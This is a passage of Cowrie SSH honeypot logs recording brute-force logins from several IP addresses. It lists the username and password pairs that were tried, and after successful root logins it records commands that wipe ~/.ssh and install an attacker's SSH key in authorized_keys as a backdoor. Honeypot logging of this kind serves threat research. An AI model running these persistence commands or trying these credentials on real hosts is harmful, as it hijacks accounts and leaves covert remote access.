03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:32:19.673850Z","src_ip":"167.99.49.89","session":"132905380eda"}
{"eventid":"cowrie.login.failed","username":"vasil","password":"vasil123","message":"login attempt [vasil/vasil123] failed","sensor":"my-vps","timestamp":"2025-08-26T13:32:20.080446Z","src_ip":"167.99.49.89","session":"132905380eda"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:32:21.174542Z","src_ip":"167.99.49.89","session":"132905380eda"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":38777,"dst_ip":"1.2.3.4","dst_port":22,"session":"bda2313ab70c","protocol":"ssh","message":"New connection: 212.227.235.229:38777 (1.2.3.4:22) [session: bda2313ab70c]","sensor":"my-vps","timestamp":"2025-08-26T13:33:01.699779Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:33:01.700743Z","src_ip":"212.227.235.229","session":"bda2313ab70c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:33:01.915835Z","src_ip":"212.227.235.229","session":"bda2313ab70c"}
{"eventid":"cowrie.login.failed","username":"user","password":"password","message":"login attempt [user/password] failed","sensor":"my-vps","timestamp":"2025-08-26T13:33:02.812463Z","src_ip":"212.227.235.229","session":"bda2313ab70c"}
{"eventid":"cowrie.session.closed","duration":"2.3","message":"Connection lost after 2.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:04.021934Z","src_ip":"212.227.235.229","session":"bda2313ab70c"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":48262,"dst_ip":"1.2.3.4","dst_port":22,"session":"85818af310fc","protocol":"ssh","message":"New connection: 167.99.49.89:48262 (1.2.3.4:22) [session: 85818af310fc]","sensor":"my-vps","timestamp":"2025-08-26T13:33:24.440305Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:33:24.441217Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:33:24.530521Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.login.success","username":"root","password":"Root!@#456","message":"login attempt [root/Root!@#456] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:33:24.928276Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:33:25.133898Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.134972Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.136473Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.228446Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:33:25.515921Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.516708Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.608861Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.609792Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":48266,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e3941fbfc5c","protocol":"ssh","message":"New connection: 167.99.49.89:48266 (1.2.3.4:22) [session: 7e3941fbfc5c]","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.697790Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.698766Z","src_ip":"167.99.49.89","session":"7e3941fbfc5c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:33:25.788762Z","src_ip":"167.99.49.89","session":"7e3941fbfc5c"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:33:26.189287Z","src_ip":"167.99.49.89","session":"7e3941fbfc5c"}
{"eventid":"cowrie.session.closed","duration":"1.6","message":"Connection lost after 1.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:27.283503Z","src_ip":"167.99.49.89","session":"7e3941fbfc5c"}
{"eventid":"cowrie.session.connect","src_ip":"167.99.49.89","src_port":48272,"dst_ip":"1.2.3.4","dst_port":22,"session":"51acc80d9e74","protocol":"ssh","message":"New connection: 167.99.49.89:48272 (1.2.3.4:22) [session: 51acc80d9e74]","sensor":"my-vps","timestamp":"2025-08-26T13:33:27.372339Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:33:27.373108Z","src_ip":"167.99.49.89","session":"51acc80d9e74"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:33:27.463846Z","src_ip":"167.99.49.89","session":"51acc80d9e74"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:33:27.868989Z","src_ip":"167.99.49.89","session":"51acc80d9e74"}
{"eventid":"cowrie.session.closed","duration":"0.6","message":"Connection lost after 0.6 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:27.961914Z","src_ip":"167.99.49.89","session":"51acc80d9e74"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:27.962849Z","src_ip":"167.99.49.89","session":"85818af310fc"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26814,"dst_ip":"1.2.3.4","dst_port":22,"session":"425a0fc6dc2c","protocol":"ssh","message":"New connection: 212.227.235.229:26814 (1.2.3.4:22) [session: 425a0fc6dc2c]","sensor":"my-vps","timestamp":"2025-08-26T13:33:42.376033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:33:42.377003Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:33:42.629913Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.login.success","username":"root","password":"abcd-1234","message":"login attempt [root/abcd-1234] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:33:43.682702Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:33:44.245934Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:33:44.246587Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-26T13:33:44.247727Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:44.501915Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T13:33:45.030905Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-26T13:33:45.031629Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-26T13:33:45.287242Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:45.288254Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26816,"dst_ip":"1.2.3.4","dst_port":22,"session":"ca531ca6c380","protocol":"ssh","message":"New connection: 212.227.235.229:26816 (1.2.3.4:22) [session: ca531ca6c380]","sensor":"my-vps","timestamp":"2025-08-26T13:33:46.544661Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:33:46.545459Z","src_ip":"212.227.235.229","session":"ca531ca6c380"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:33:46.796029Z","src_ip":"212.227.235.229","session":"ca531ca6c380"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-26T13:33:48.497529Z","src_ip":"212.227.235.229","session":"ca531ca6c380"}
{"eventid":"cowrie.session.closed","duration":"3.2","message":"Connection lost after 3.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:49.750437Z","src_ip":"212.227.235.229","session":"ca531ca6c380"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":26818,"dst_ip":"1.2.3.4","dst_port":22,"session":"be318144b528","protocol":"ssh","message":"New connection: 212.227.235.229:26818 (1.2.3.4:22) [session: be318144b528]","sensor":"my-vps","timestamp":"2025-08-26T13:33:50.982277Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-26T13:33:50.983421Z","src_ip":"212.227.235.229","session":"be318144b528"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-26T13:33:51.223136Z","src_ip":"212.227.235.229","session":"be318144b528"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-26T13:33:52.224381Z","src_ip":"212.227.235.229","session":"be318144b528"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:52.465384Z","src_ip":"212.227.235.229","session":"be318144b528"}
{"eventid":"cowrie.session.closed","duration":"10.1","message":"Connection lost after 10.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T13:33:52.476922Z","src_ip":"212.227.235.229","session":"425a0fc6dc2c"}
{"eventid":"cowrie.session.connect","src_ip":"193.32.162.145","src_port":57402,"dst_ip":"1.2.3.4","dst_port":22,"session":"806c96770580","protocol":"ssh","message":"New connection: 193.32.162.145:57402 (1.2.3.4:22) [session: 806c96770580]","sensor":"my-vps","timestamp":"2025-08-26T13:34:12.450745Z"}
